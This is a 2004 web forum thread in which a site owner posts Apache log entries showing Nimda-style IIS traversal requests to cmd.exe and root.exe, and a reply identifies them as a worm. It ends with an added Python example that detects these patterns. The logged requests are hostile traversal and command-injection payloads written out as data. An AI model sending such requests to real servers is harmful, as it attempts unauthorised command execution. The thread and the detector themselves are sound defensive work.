80.***.225.152 - - [18/May/2004:23:05:56 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:56 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
Am I mistaken in thinking that these are attempts to get (root) access to my server?
(IP shown is originating IP)
Grtz,
Marck
[edited by: tedster at 8:30 pm (utc) on May 20, 2004]
[edit reason] obscure the IPs [/edit]
Your log entries are classic Nimda, but could also be made by a vulnerability scanner. If they are made by a scanner, you will see a lot of other strange stuff in your entry, so rest assured, this is Nimda and it cannot infect your Apache.
Keep looking through your log files regularly for strange entries and react when you find them. You can always ask in forums like this, but you would also be able to find out about them by searching in Google.
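Added example, not part of the original posts: a small Python check for the request patterns in the log above (shell binary names, repeated percent-encoding, the invalid UTF-8 lead bytes %c0/%c1, and `../` or `..\` after decoding). The sample lines are constructed, 192.0.2.10 is a documentation address, and the function names and reason labels are this example's own.

```python
import re
from urllib.parse import unquote

# Apache common/combined log: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
WIN_SHELL = re.compile(r'(?:cmd|root)\.exe', re.I)  # binaries requested in the thread's log
BAD_UTF8 = re.compile(r'%c[01]', re.I)              # 0xC0/0xC1 never occur in valid UTF-8
TRAVERSAL = re.compile(r'\.\.[\\/]')                # "../" or "..\" once decoded

def decode_rounds(path, limit=4):
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < limit:
        nxt = unquote(path, encoding="latin-1")  # latin-1 keeps every byte visible
        if nxt == path:
            break
        path, rounds = nxt, rounds + 1
    return path, rounds

def classify(line):
    """Return (host, status, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, target, status = m.groups()
    raw = target.split("?", 1)[0]          # inspect the path, not the query string
    decoded, rounds = decode_rounds(raw)
    checks = [
        ("windows-shell", WIN_SHELL.search(decoded)),
        ("double-encoding", rounds > 1),   # e.g. %255c -> %5c -> backslash
        ("invalid-utf8-lead", BAD_UTF8.search(raw)),
        ("traversal", TRAVERSAL.search(decoded)),
    ]
    return host, int(status), [name for name, hit in checks if hit]

# Constructed sample lines modelled on the entries in the thread.
SAMPLE = [
    '192.0.2.10 - - [18/May/2004:23:05:56 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 "-" "-"',
    '192.0.2.10 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"',
    '192.0.2.10 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"',
    '192.0.2.10 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"',
    '192.0.2.10 - - [18/May/2004:23:06:10 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```

The status code is returned with the reasons so that a flagged request answered with a 2xx can be looked at first.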